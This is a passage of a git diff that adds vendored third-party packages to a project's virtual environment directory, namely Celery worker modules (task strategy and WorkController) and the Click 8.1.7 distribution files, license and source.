self._revoked_tasks.purge() + + def _merge_revoked_v3(self, zrevoked): + if zrevoked: + self._revoked_tasks.update(pickle.loads(self.decompress(zrevoked))) + + def _merge_revoked_v2(self, saved): + if not isinstance(saved, LimitedSet): + # (pre 3.0.18) used to be stored as a dict + return self._merge_revoked_v1(saved) + self._revoked_tasks.update(saved) + + def _merge_revoked_v1(self, saved): + add = self._revoked_tasks.add + for item in saved: + add(item) + + def _dumps(self, obj): + return pickle.dumps(obj, protocol=self.protocol) + + @property + def _revoked_tasks(self): + return self.state.revoked + + @cached_property + def db(self): + self._is_open = True + return self.open() diff --git a/env/Lib/site-packages/celery/worker/strategy.py b/env/Lib/site-packages/celery/worker/strategy.py new file mode 100644 index 00000000..3fe5fa14 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/strategy.py @@ -0,0 +1,208 @@ +"""Task execution strategy (optimization).""" +import logging + +from kombu.asynchronous.timer import to_timestamp + +from celery import signals +from celery.app import trace as _app_trace +from celery.exceptions import InvalidTaskError +from celery.utils.imports import symbol_by_name +from celery.utils.log import get_logger +from celery.utils.saferepr import saferepr +from celery.utils.time import timezone + +from .request import create_request_cls +from .state import task_reserved + +__all__ = ('default',) + +logger = get_logger(__name__) + +# pylint: disable=redefined-outer-name +# We cache globals and attribute lookups, so disable this warning. + + +def hybrid_to_proto2(message, body): + """Create a fresh protocol 2 message from a hybrid protocol 1/2 message.""" + try: + args, kwargs = body.get('args', ()), body.get('kwargs', {}) + kwargs.items # pylint: disable=pointless-statement + except KeyError: + raise InvalidTaskError('Message does not have args/kwargs') + except AttributeError: + raise InvalidTaskError( + 'Task keyword arguments must be a mapping', + ) + + headers = { + 'lang': body.get('lang'), + 'task': body.get('task'), + 'id': body.get('id'), + 'root_id': body.get('root_id'), + 'parent_id': body.get('parent_id'), + 'group': body.get('group'), + 'meth': body.get('meth'), + 'shadow': body.get('shadow'), + 'eta': body.get('eta'), + 'expires': body.get('expires'), + 'retries': body.get('retries', 0), + 'timelimit': body.get('timelimit', (None, None)), + 'argsrepr': body.get('argsrepr'), + 'kwargsrepr': body.get('kwargsrepr'), + 'origin': body.get('origin'), + } + headers.update(message.headers or {}) + + embed = { + 'callbacks': body.get('callbacks'), + 'errbacks': body.get('errbacks'), + 'chord': body.get('chord'), + 'chain': None, + } + + return (args, kwargs, embed), headers, True, body.get('utc', True) + + +def proto1_to_proto2(message, body): + """Convert Task message protocol 1 arguments to protocol 2. + + Returns: + Tuple: of ``(body, headers, already_decoded_status, utc)`` + """ + try: + args, kwargs = body.get('args', ()), body.get('kwargs', {}) + kwargs.items # pylint: disable=pointless-statement + except KeyError: + raise InvalidTaskError('Message does not have args/kwargs') + except AttributeError: + raise InvalidTaskError( + 'Task keyword arguments must be a mapping', + ) + body.update( + argsrepr=saferepr(args), + kwargsrepr=saferepr(kwargs), + headers=message.headers, + ) + try: + body['group'] = body['taskset'] + except KeyError: + pass + embed = { + 'callbacks': body.get('callbacks'), + 'errbacks': body.get('errbacks'), + 'chord': body.get('chord'), + 'chain': None, + } + return (args, kwargs, embed), body, True, body.get('utc', True) + + +def default(task, app, consumer, + info=logger.info, error=logger.error, task_reserved=task_reserved, + to_system_tz=timezone.to_system, bytes=bytes, + proto1_to_proto2=proto1_to_proto2): + """Default task execution strategy. + + Note: + Strategies are here as an optimization, so sadly + it's not very easy to override. + """ + hostname = consumer.hostname + connection_errors = consumer.connection_errors + _does_info = logger.isEnabledFor(logging.INFO) + + # task event related + # (optimized to avoid calling request.send_event) + eventer = consumer.event_dispatcher + events = eventer and eventer.enabled + send_event = eventer and eventer.send + task_sends_events = events and task.send_events + + call_at = consumer.timer.call_at + apply_eta_task = consumer.apply_eta_task + rate_limits_enabled = not consumer.disable_rate_limits + get_bucket = consumer.task_buckets.__getitem__ + handle = consumer.on_task_request + limit_task = consumer._limit_task + limit_post_eta = consumer._limit_post_eta + Request = symbol_by_name(task.Request) + Req = create_request_cls(Request, task, consumer.pool, hostname, eventer, app=app) + + revoked_tasks = consumer.controller.state.revoked + + def task_message_handler(message, body, ack, reject, callbacks, + to_timestamp=to_timestamp): + if body is None and 'args' not in message.payload: + body, headers, decoded, utc = ( + message.body, message.headers, False, app.uses_utc_timezone(), + ) + else: + if 'args' in message.payload: + body, headers, decoded, utc = hybrid_to_proto2(message, + message.payload) + else: + body, headers, decoded, utc = proto1_to_proto2(message, body) + + req = Req( + message, + on_ack=ack, on_reject=reject, app=app, hostname=hostname, + eventer=eventer, task=task, connection_errors=connection_errors, + body=body, headers=headers, decoded=decoded, utc=utc, + ) + if _does_info: + # Similar to `app.trace.info()`, we pass the formatting args as the + # `extra` kwarg for custom log handlers + context = { + 'id': req.id, + 'name': req.name, + 'args': req.argsrepr, + 'kwargs': req.kwargsrepr, + 'eta': req.eta, + } + info(_app_trace.LOG_RECEIVED, context, extra={'data': context}) + if (req.expires or req.id in revoked_tasks) and req.revoked(): + return + + signals.task_received.send(sender=consumer, request=req) + + if task_sends_events: + send_event( + 'task-received', + uuid=req.id, name=req.name, + args=req.argsrepr, kwargs=req.kwargsrepr, + root_id=req.root_id, parent_id=req.parent_id, + retries=req.request_dict.get('retries', 0), + eta=req.eta and req.eta.isoformat(), + expires=req.expires and req.expires.isoformat(), + ) + + bucket = None + eta = None + if req.eta: + try: + if req.utc: + eta = to_timestamp(to_system_tz(req.eta)) + else: + eta = to_timestamp(req.eta, app.timezone) + except (OverflowError, ValueError) as exc: + error("Couldn't convert ETA %r to timestamp: %r. Task: %r", + req.eta, exc, req.info(safe=True), exc_info=True) + req.reject(requeue=False) + if rate_limits_enabled: + bucket = get_bucket(task.name) + + if eta and bucket: + consumer.qos.increment_eventually() + return call_at(eta, limit_post_eta, (req, bucket, 1), + priority=6) + if eta: + consumer.qos.increment_eventually() + call_at(eta, apply_eta_task, (req,), priority=6) + return task_message_handler + if bucket: + return limit_task(req, bucket, 1) + + task_reserved(req) + if callbacks: + [callback(req) for callback in callbacks] + handle(req) + return task_message_handler diff --git a/env/Lib/site-packages/celery/worker/worker.py b/env/Lib/site-packages/celery/worker/worker.py new file mode 100644 index 00000000..04f8c30e --- /dev/null +++ b/env/Lib/site-packages/celery/worker/worker.py @@ -0,0 +1,409 @@ +"""WorkController can be used to instantiate in-process workers. + +The command-line interface for the worker is in :mod:`celery.bin.worker`, +while the worker program is in :mod:`celery.apps.worker`. + +The worker program is responsible for adding signal handlers, +setting up logging, etc. This is a bare-bones worker without +global side-effects (i.e., except for the global state stored in +:mod:`celery.worker.state`). + +The worker consists of several components, all managed by bootsteps +(mod:`celery.bootsteps`). +""" + +import os +import sys +from datetime import datetime + +from billiard import cpu_count +from kombu.utils.compat import detect_environment + +from celery import bootsteps +from celery import concurrency as _concurrency +from celery import signals +from celery.bootsteps import RUN, TERMINATE +from celery.exceptions import ImproperlyConfigured, TaskRevokedError, WorkerTerminate +from celery.platforms import EX_FAILURE, create_pidlock +from celery.utils.imports import reload_from_cwd +from celery.utils.log import mlevel +from celery.utils.log import worker_logger as logger +from celery.utils.nodenames import default_nodename, worker_direct +from celery.utils.text import str_to_list +from celery.utils.threads import default_socket_timeout + +from . import state + +try: + import resource +except ImportError: + resource = None + + +__all__ = ('WorkController',) + +#: Default socket timeout at shutdown. +SHUTDOWN_SOCKET_TIMEOUT = 5.0 + +SELECT_UNKNOWN_QUEUE = """ +Trying to select queue subset of {0!r}, but queue {1} isn't +defined in the `task_queues` setting. + +If you want to automatically declare unknown queues you can +enable the `task_create_missing_queues` setting. +""" + +DESELECT_UNKNOWN_QUEUE = """ +Trying to deselect queue subset of {0!r}, but queue {1} isn't +defined in the `task_queues` setting. +""" + + +class WorkController: + """Unmanaged worker instance.""" + + app = None + + pidlock = None + blueprint = None + pool = None + semaphore = None + + #: contains the exit code if a :exc:`SystemExit` event is handled. + exitcode = None + + class Blueprint(bootsteps.Blueprint): + """Worker bootstep blueprint.""" + + name = 'Worker' + default_steps = { + 'celery.worker.components:Hub', + 'celery.worker.components:Pool', + 'celery.worker.components:Beat', + 'celery.worker.components:Timer', + 'celery.worker.components:StateDB', + 'celery.worker.components:Consumer', + 'celery.worker.autoscale:WorkerComponent', + } + + def __init__(self, app=None, hostname=None, **kwargs): + self.app = app or self.app + self.hostname = default_nodename(hostname) + self.startup_time = datetime.utcnow() + self.app.loader.init_worker() + self.on_before_init(**kwargs) + self.setup_defaults(**kwargs) + self.on_after_init(**kwargs) + + self.setup_instance(**self.prepare_args(**kwargs)) + + def setup_instance(self, queues=None, ready_callback=None, pidfile=None, + include=None, use_eventloop=None, exclude_queues=None, + **kwargs): + self.pidfile = pidfile + self.setup_queues(queues, exclude_queues) + self.setup_includes(str_to_list(include)) + + # Set default concurrency + if not self.concurrency: + try: + self.concurrency = cpu_count() + except NotImplementedError: + self.concurrency = 2 + + # Options + self.loglevel = mlevel(self.loglevel) + self.ready_callback = ready_callback or self.on_consumer_ready + + # this connection won't establish, only used for params + self._conninfo = self.app.connection_for_read() + self.use_eventloop = ( + self.should_use_eventloop() if use_eventloop is None + else use_eventloop + ) + self.options = kwargs + + signals.worker_init.send(sender=self) + + # Initialize bootsteps + self.pool_cls = _concurrency.get_implementation(self.pool_cls) + self.steps = [] + self.on_init_blueprint() + self.blueprint = self.Blueprint( + steps=self.app.steps['worker'], + on_start=self.on_start, + on_close=self.on_close, + on_stopped=self.on_stopped, + ) + self.blueprint.apply(self, **kwargs) + + def on_init_blueprint(self): + pass + + def on_before_init(self, **kwargs): + pass + + def on_after_init(self, **kwargs): + pass + + def on_start(self): + if self.pidfile: + self.pidlock = create_pidlock(self.pidfile) + + def on_consumer_ready(self, consumer): + pass + + def on_close(self): + self.app.loader.shutdown_worker() + + def on_stopped(self): + self.timer.stop() + self.consumer.shutdown() + + if self.pidlock: + self.pidlock.release() + + def setup_queues(self, include, exclude=None): + include = str_to_list(include) + exclude = str_to_list(exclude) + try: + self.app.amqp.queues.select(include) + except KeyError as exc: + raise ImproperlyConfigured( + SELECT_UNKNOWN_QUEUE.strip().format(include, exc)) + try: + self.app.amqp.queues.deselect(exclude) + except KeyError as exc: + raise ImproperlyConfigured( + DESELECT_UNKNOWN_QUEUE.strip().format(exclude, exc)) + if self.app.conf.worker_direct: + self.app.amqp.queues.select_add(worker_direct(self.hostname)) + + def setup_includes(self, includes): + # Update celery_include to have all known task modules, so that we + # ensure all task modules are imported in case an execv happens. + prev = tuple(self.app.conf.include) + if includes: + prev += tuple(includes) + [self.app.loader.import_task_module(m) for m in includes] + self.include = includes + task_modules = {task.__class__.__module__ + for task in self.app.tasks.values()} + self.app.conf.include = tuple(set(prev) | task_modules) + + def prepare_args(self, **kwargs): + return kwargs + + def _send_worker_shutdown(self): + signals.worker_shutdown.send(sender=self) + + def start(self): + try: + self.blueprint.start(self) + except WorkerTerminate: + self.terminate() + except Exception as exc: + logger.critical('Unrecoverable error: %r', exc, exc_info=True) + self.stop(exitcode=EX_FAILURE) + except SystemExit as exc: + self.stop(exitcode=exc.code) + except KeyboardInterrupt: + self.stop(exitcode=EX_FAILURE) + + def register_with_event_loop(self, hub): + self.blueprint.send_all( + self, 'register_with_event_loop', args=(hub,), + description='hub.register', + ) + + def _process_task_sem(self, req): + return self._quick_acquire(self._process_task, req) + + def _process_task(self, req): + """Process task by sending it to the pool of workers.""" + try: + req.execute_using_pool(self.pool) + except TaskRevokedError: + try: + self._quick_release() # Issue 877 + except AttributeError: + pass + + def signal_consumer_close(self): + try: + self.consumer.close() + except AttributeError: + pass + + def should_use_eventloop(self): + return (detect_environment() == 'default' and + self._conninfo.transport.implements.asynchronous and + not self.app.IS_WINDOWS) + + def stop(self, in_sighandler=False, exitcode=None): + """Graceful shutdown of the worker server.""" + if exitcode is not None: + self.exitcode = exitcode + if self.blueprint.state == RUN: + self.signal_consumer_close() + if not in_sighandler or self.pool.signal_safe: + self._shutdown(warm=True) + self._send_worker_shutdown() + + def terminate(self, in_sighandler=False): + """Not so graceful shutdown of the worker server.""" + if self.blueprint.state != TERMINATE: + self.signal_consumer_close() + if not in_sighandler or self.pool.signal_safe: + self._shutdown(warm=False) + + def _shutdown(self, warm=True): + # if blueprint does not exist it means that we had an + # error before the bootsteps could be initialized. + if self.blueprint is not None: + with default_socket_timeout(SHUTDOWN_SOCKET_TIMEOUT): # Issue 975 + self.blueprint.stop(self, terminate=not warm) + self.blueprint.join() + + def reload(self, modules=None, reload=False, reloader=None): + list(self._reload_modules( + modules, force_reload=reload, reloader=reloader)) + + if self.consumer: + self.consumer.update_strategies() + self.consumer.reset_rate_limits() + try: + self.pool.restart() + except NotImplementedError: + pass + + def _reload_modules(self, modules=None, **kwargs): + return ( + self._maybe_reload_module(m, **kwargs) + for m in set(self.app.loader.task_modules + if modules is None else (modules or ())) + ) + + def _maybe_reload_module(self, module, force_reload=False, reloader=None): + if module not in sys.modules: + logger.debug('importing module %s', module) + return self.app.loader.import_from_cwd(module) + elif force_reload: + logger.debug('reloading module %s', module) + return reload_from_cwd(sys.modules[module], reloader) + + def info(self): + uptime = datetime.utcnow() - self.startup_time + return {'total': self.state.total_count, + 'pid': os.getpid(), + 'clock': str(self.app.clock), + 'uptime': round(uptime.total_seconds())} + + def rusage(self): + if resource is None: + raise NotImplementedError('rusage not supported by this platform') + s = resource.getrusage(resource.RUSAGE_SELF) + return { + 'utime': s.ru_utime, + 'stime': s.ru_stime, + 'maxrss': s.ru_maxrss, + 'ixrss': s.ru_ixrss, + 'idrss': s.ru_idrss, + 'isrss': s.ru_isrss, + 'minflt': s.ru_minflt, + 'majflt': s.ru_majflt, + 'nswap': s.ru_nswap, + 'inblock': s.ru_inblock, + 'oublock': s.ru_oublock, + 'msgsnd': s.ru_msgsnd, + 'msgrcv': s.ru_msgrcv, + 'nsignals': s.ru_nsignals, + 'nvcsw': s.ru_nvcsw, + 'nivcsw': s.ru_nivcsw, + } + + def stats(self): + info = self.info() + info.update(self.blueprint.info(self)) + info.update(self.consumer.blueprint.info(self.consumer)) + try: + info['rusage'] = self.rusage() + except NotImplementedError: + info['rusage'] = 'N/A' + return info + + def __repr__(self): + """``repr(worker)``.""" + return ''.format( + self=self, + state=self.blueprint.human_state() if self.blueprint else 'INIT', + ) + + def __str__(self): + """``str(worker) == worker.hostname``.""" + return self.hostname + + @property + def state(self): + return state + + def setup_defaults(self, concurrency=None, loglevel='WARN', logfile=None, + task_events=None, pool=None, consumer_cls=None, + timer_cls=None, timer_precision=None, + autoscaler_cls=None, + pool_putlocks=None, + pool_restarts=None, + optimization=None, O=None, # O maps to -O=fair + statedb=None, + time_limit=None, + soft_time_limit=None, + scheduler=None, + pool_cls=None, # XXX use pool + state_db=None, # XXX use statedb + task_time_limit=None, # XXX use time_limit + task_soft_time_limit=None, # XXX use soft_time_limit + scheduler_cls=None, # XXX use scheduler + schedule_filename=None, + max_tasks_per_child=None, + prefetch_multiplier=None, disable_rate_limits=None, + worker_lost_wait=None, + max_memory_per_child=None, **_kw): + either = self.app.either + self.loglevel = loglevel + self.logfile = logfile + + self.concurrency = either('worker_concurrency', concurrency) + self.task_events = either('worker_send_task_events', task_events) + self.pool_cls = either('worker_pool', pool, pool_cls) + self.consumer_cls = either('worker_consumer', consumer_cls) + self.timer_cls = either('worker_timer', timer_cls) + self.timer_precision = either( + 'worker_timer_precision', timer_precision, + ) + self.optimization = optimization or O + self.autoscaler_cls = either('worker_autoscaler', autoscaler_cls) + self.pool_putlocks = either('worker_pool_putlocks', pool_putlocks) + self.pool_restarts = either('worker_pool_restarts', pool_restarts) + self.statedb = either('worker_state_db', statedb, state_db) + self.schedule_filename = either( + 'beat_schedule_filename', schedule_filename, + ) + self.scheduler = either('beat_scheduler', scheduler, scheduler_cls) + self.time_limit = either( + 'task_time_limit', time_limit, task_time_limit) + self.soft_time_limit = either( + 'task_soft_time_limit', soft_time_limit, task_soft_time_limit, + ) + self.max_tasks_per_child = either( + 'worker_max_tasks_per_child', max_tasks_per_child, + ) + self.max_memory_per_child = either( + 'worker_max_memory_per_child', max_memory_per_child, + ) + self.prefetch_multiplier = int(either( + 'worker_prefetch_multiplier', prefetch_multiplier, + )) + self.disable_rate_limits = either( + 'worker_disable_rate_limits', disable_rate_limits, + ) + self.worker_lost_wait = either('worker_lost_wait', worker_lost_wait) diff --git a/env/Lib/site-packages/click-8.1.7.dist-info/INSTALLER b/env/Lib/site-packages/click-8.1.7.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/click-8.1.7.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/click-8.1.7.dist-info/LICENSE.rst b/env/Lib/site-packages/click-8.1.7.dist-info/LICENSE.rst new file mode 100644 index 00000000..d12a8491 --- /dev/null +++ b/env/Lib/site-packages/click-8.1.7.dist-info/LICENSE.rst @@ -0,0 +1,28 @@ +Copyright 2014 Pallets + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + +1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A +PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED +TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR +PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF +LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING +NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/env/Lib/site-packages/click-8.1.7.dist-info/METADATA b/env/Lib/site-packages/click-8.1.7.dist-info/METADATA new file mode 100644 index 00000000..7a6bbb24 --- /dev/null +++ b/env/Lib/site-packages/click-8.1.7.dist-info/METADATA @@ -0,0 +1,103 @@ +Metadata-Version: 2.1 +Name: click +Version: 8.1.7 +Summary: Composable command line interface toolkit +Home-page: https://palletsprojects.com/p/click/ +Maintainer: Pallets +Maintainer-email: contact@palletsprojects.com +License: BSD-3-Clause +Project-URL: Donate, https://palletsprojects.com/donate +Project-URL: Documentation, https://click.palletsprojects.com/ +Project-URL: Changes, https://click.palletsprojects.com/changes/ +Project-URL: Source Code, https://github.com/pallets/click/ +Project-URL: Issue Tracker, https://github.com/pallets/click/issues/ +Project-URL: Chat, https://discord.gg/pallets +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: BSD License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Requires-Python: >=3.7 +Description-Content-Type: text/x-rst +License-File: LICENSE.rst +Requires-Dist: colorama ; platform_system == "Windows" +Requires-Dist: importlib-metadata ; python_version < "3.8" + +\$ click\_ +========== + +Click is a Python package for creating beautiful command line interfaces +in a composable way with as little code as necessary. It's the "Command +Line Interface Creation Kit". It's highly configurable but comes with +sensible defaults out of the box. + +It aims to make the process of writing command line tools quick and fun +while also preventing any frustration caused by the inability to +implement an intended CLI API. + +Click in three points: + +- Arbitrary nesting of commands +- Automatic help page generation +- Supports lazy loading of subcommands at runtime + + +Installing +---------- + +Install and update using `pip`_: + +.. code-block:: text + + $ pip install -U click + +.. _pip: https://pip.pypa.io/en/stable/getting-started/ + + +A Simple Example +---------------- + +.. code-block:: python + + import click + + @click.command() + @click.option("--count", default=1, help="Number of greetings.") + @click.option("--name", prompt="Your name", help="The person to greet.") + def hello(count, name): + """Simple program that greets NAME for a total of COUNT times.""" + for _ in range(count): + click.echo(f"Hello, {name}!") + + if __name__ == '__main__': + hello() + +.. code-block:: text + + $ python hello.py --count=3 + Your name: Click + Hello, Click! + Hello, Click! + Hello, Click! + + +Donate +------ + +The Pallets organization develops and supports Click and other popular +packages. In order to grow the community of contributors and users, and +allow the maintainers to devote more time to the projects, `please +donate today`_. + +.. _please donate today: https://palletsprojects.com/donate + + +Links +----- + +- Documentation: https://click.palletsprojects.com/ +- Changes: https://click.palletsprojects.com/changes/ +- PyPI Releases: https://pypi.org/project/click/ +- Source Code: https://github.com/pallets/click +- Issue Tracker: https://github.com/pallets/click/issues +- Chat: https://discord.gg/pallets diff --git a/env/Lib/site-packages/click-8.1.7.dist-info/RECORD b/env/Lib/site-packages/click-8.1.7.dist-info/RECORD new file mode 100644 index 00000000..7bc97df8 --- /dev/null +++ b/env/Lib/site-packages/click-8.1.7.dist-info/RECORD @@ -0,0 +1,39 @@ +click-8.1.7.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +click-8.1.7.dist-info/LICENSE.rst,sha256=morRBqOU6FO_4h9C9OctWSgZoigF2ZG18ydQKSkrZY0,1475 +click-8.1.7.dist-info/METADATA,sha256=qIMevCxGA9yEmJOM_4WHuUJCwWpsIEVbCPOhs45YPN4,3014 +click-8.1.7.dist-info/RECORD,, +click-8.1.7.dist-info/WHEEL,sha256=5sUXSg9e4bi7lTLOHcm6QEYwO5TIF1TNbTSVFVjcJcc,92 +click-8.1.7.dist-info/top_level.txt,sha256=J1ZQogalYS4pphY_lPECoNMfw0HzTSrZglC4Yfwo4xA,6 +click/__init__.py,sha256=YDDbjm406dTOA0V8bTtdGnhN7zj5j-_dFRewZF_pLvw,3138 +click/__pycache__/__init__.cpython-310.pyc,, +click/__pycache__/_compat.cpython-310.pyc,, +click/__pycache__/_termui_impl.cpython-310.pyc,, +click/__pycache__/_textwrap.cpython-310.pyc,, +click/__pycache__/_winconsole.cpython-310.pyc,, +click/__pycache__/core.cpython-310.pyc,, +click/__pycache__/decorators.cpython-310.pyc,, +click/__pycache__/exceptions.cpython-310.pyc,, +click/__pycache__/formatting.cpython-310.pyc,, +click/__pycache__/globals.cpython-310.pyc,, +click/__pycache__/parser.cpython-310.pyc,, +click/__pycache__/shell_completion.cpython-310.pyc,, +click/__pycache__/termui.cpython-310.pyc,, +click/__pycache__/testing.cpython-310.pyc,, +click/__pycache__/types.cpython-310.pyc,, +click/__pycache__/utils.cpython-310.pyc,, +click/_compat.py,sha256=5318agQpbt4kroKsbqDOYpTSWzL_YCZVUQiTT04yXmc,18744 +click/_termui_impl.py,sha256=3dFYv4445Nw-rFvZOTBMBPYwB1bxnmNk9Du6Dm_oBSU,24069 +click/_textwrap.py,sha256=10fQ64OcBUMuK7mFvh8363_uoOxPlRItZBmKzRJDgoY,1353 +click/_winconsole.py,sha256=5ju3jQkcZD0W27WEMGqmEP4y_crUVzPCqsX_FYb7BO0,7860 +click/core.py,sha256=j6oEWtGgGna8JarD6WxhXmNnxLnfRjwXglbBc-8jr7U,114086 +click/decorators.py,sha256=-ZlbGYgV-oI8jr_oH4RpuL1PFS-5QmeuEAsLDAYgxtw,18719 +click/exceptions.py,sha256=fyROO-47HWFDjt2qupo7A3J32VlpM-ovJnfowu92K3s,9273 +click/formatting.py,sha256=Frf0-5W33-loyY_i9qrwXR8-STnW3m5gvyxLVUdyxyk,9706 +click/globals.py,sha256=TP-qM88STzc7f127h35TD_v920FgfOD2EwzqA0oE8XU,1961 +click/parser.py,sha256=LKyYQE9ZLj5KgIDXkrcTHQRXIggfoivX14_UVIn56YA,19067 +click/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +click/shell_completion.py,sha256=Ty3VM_ts0sQhj6u7eFTiLwHPoTgcXTGEAUg2OpLqYKw,18460 +click/termui.py,sha256=H7Q8FpmPelhJ2ovOhfCRhjMtCpNyjFXryAMLZODqsdc,28324 +click/testing.py,sha256=1Qd4kS5bucn1hsNIRryd0WtTMuCpkA93grkWxT8POsU,16084 +click/types.py,sha256=TZvz3hKvBztf-Hpa2enOmP4eznSPLzijjig5b_0XMxE,36391 +click/utils.py,sha256=1476UduUNY6UePGU4m18uzVHLt1sKM2PP3yWsQhbItM,20298 diff --git a/env/Lib/site-packages/click-8.1.7.dist-info/WHEEL b/env/Lib/site-packages/click-8.1.7.dist-info/WHEEL new file mode 100644 index 00000000..2c08da08 --- /dev/null +++ b/env/Lib/site-packages/click-8.1.7.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.41.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/env/Lib/site-packages/click-8.1.7.dist-info/top_level.txt b/env/Lib/site-packages/click-8.1.7.dist-info/top_level.txt new file mode 100644 index 00000000..dca9a909 --- /dev/null +++ b/env/Lib/site-packages/click-8.1.7.dist-info/top_level.txt @@ -0,0 +1 @@ +click diff --git a/env/Lib/site-packages/click/__init__.py b/env/Lib/site-packages/click/__init__.py new file mode 100644 index 00000000..9a1dab04 --- /dev/null +++ b/env/Lib/site-packages/click/__init__.py @@ -0,0 +1,73 @@ +""" +Click is a simple Python module inspired by the stdlib optparse to make +writing command line scripts fun. Unlike other modules, it's based +around a simple API that does not come with too much magic and is +composable. +""" +from .core import Argument as Argument +from .core import BaseCommand as BaseCommand +from .core import Command as Command +from .core import CommandCollection as CommandCollection +from .core import Context as Context +from .core import Group as Group +from .core import MultiCommand as MultiCommand +from .core import Option as Option +from .core import Parameter as Parameter +from .decorators import argument as argument +from .decorators import command as command +from .decorators import confirmation_option as confirmation_option +from .decorators import group as group +from .decorators import help_option as help_option +from .decorators import make_pass_decorator as make_pass_decorator +from .decorators import option as option +from .decorators import pass_context as pass_context +from .decorators import pass_obj as pass_obj +from .decorators import password_option as password_option +from .decorators import version_option as version_option +from .exceptions import Abort as Abort +from .exceptions import BadArgumentUsage as BadArgumentUsage +from .exceptions import BadOptionUsage as BadOptionUsage +from .exceptions import BadParameter as BadParameter +from .exceptions import ClickException as ClickException +from .exceptions import FileError as FileError +from .exceptions import MissingParameter as MissingParameter +from .exceptions import NoSuchOption as NoSuchOption +from .exceptions import UsageError as UsageError +from .formatting import HelpFormatter as HelpFormatter +from .formatting import wrap_text as wrap_text +from .globals import get_current_context as get_current_context +from .parser import OptionParser as OptionParser +from .termui import clear as clear +from .termui import confirm as confirm +from .termui import echo_via_pager as echo_via_pager +from .termui import edit as edit +from .termui import getchar as getchar +from .termui import launch as launch +from .termui import pause as pause +from .termui import progressbar as progressbar +from .termui import prompt as prompt +from .termui import secho as secho +from .termui import style as style +from .termui import unstyle as unstyle +from .types import BOOL as BOOL +from .types import Choice as Choice +from .types import DateTime as DateTime +from .types import File as File +from .types import FLOAT as FLOAT +from .types import FloatRange as FloatRange +from .types import INT as INT +from .types import IntRange as IntRange +from .types import ParamType as ParamType +from .types import Path as Path +from .types import STRING as STRING +from .types import Tuple as Tuple +from .types import UNPROCESSED as UNPROCESSED +from .types import UUID as UUID +from .utils import echo as echo +from .utils import format_filename as format_filename +from .utils import get_app_dir as get_app_dir +from .utils import get_binary_stream as get_binary_stream +from .utils import get_text_stream as get_text_stream +from .utils import open_file as open_file + +__version__ = "8.1.7" diff --git a/env/Lib/site-packages/click/_compat.py b/env/Lib/site-packages/click/_compat.py new file mode 100644 index 00000000..23f88665 --- /dev/null +++ b/env/Lib/site-packages/click/_compat.py @@ -0,0 +1,623 @@ +import codecs +import io +import os +import re +import sys +import typing as t +from weakref import WeakKeyDictionary + +CYGWIN = sys.platform.startswith("cygwin") +WIN = sys.platform.startswith("win") +auto_wrap_for_ansi: t.Optional[t.Callable[[t.TextIO], t.TextIO]] = None +_ansi_re = re.compile(r"\033\[[;?0-9]*[a-zA-Z]") + + +def _make_text_stream( + stream: t.BinaryIO, + encoding: t.Optional[str], + errors: t.Optional[str], + force_readable: bool = False, + force_writable: bool = False, +) -> t.TextIO: + if encoding is None: + encoding = get_best_encoding(stream) + if errors is None: + errors = "replace" + return _NonClosingTextIOWrapper( + stream, + encoding, + errors, + line_buffering=True, + force_readable=force_readable, + force_writable=force_writable, + ) + + +def is_ascii_encoding(encoding: str) -> bool: + """Checks if a given encoding is ascii.""" + try: + return codecs.lookup(encoding).name == "ascii" + except LookupError: + return False + + +def get_best_encoding(stream: t.IO[t.Any]) -> str: + """Returns the default stream encoding if not found.""" + rv = getattr(stream, "encoding", None) or sys.getdefaultencoding() + if is_ascii_encoding(rv): + return "utf-8" + return rv + + +class _NonClosingTextIOWrapper(io.TextIOWrapper): + def __init__( + self, + stream: t.BinaryIO, + encoding: t.Optional[str], + errors: t.Optional[str], + force_readable: bool = False, + force_writable: bool = False, + **extra: t.Any, + ) -> None: + self._stream = stream = t.cast( + t.BinaryIO, _FixupStream(stream, force_readable, force_writable) + ) + super().__init__(stream, encoding, errors, **extra) + + def __del__(self) -> None: + try: + self.detach() + except Exception: + pass + + def isatty(self) -> bool: + # https://bitbucket.org/pypy/pypy/issue/1803 + return self._stream.isatty() + + +class _FixupStream: + """The new io interface needs more from streams than streams + traditionally implement. As such, this fix-up code is necessary in + some circumstances. + + The forcing of readable and writable flags are there because some tools + put badly patched objects on sys (one such offender are certain version + of jupyter notebook). + """ + + def __init__( + self, + stream: t.BinaryIO, + force_readable: bool = False, + force_writable: bool = False, + ): + self._stream = stream + self._force_readable = 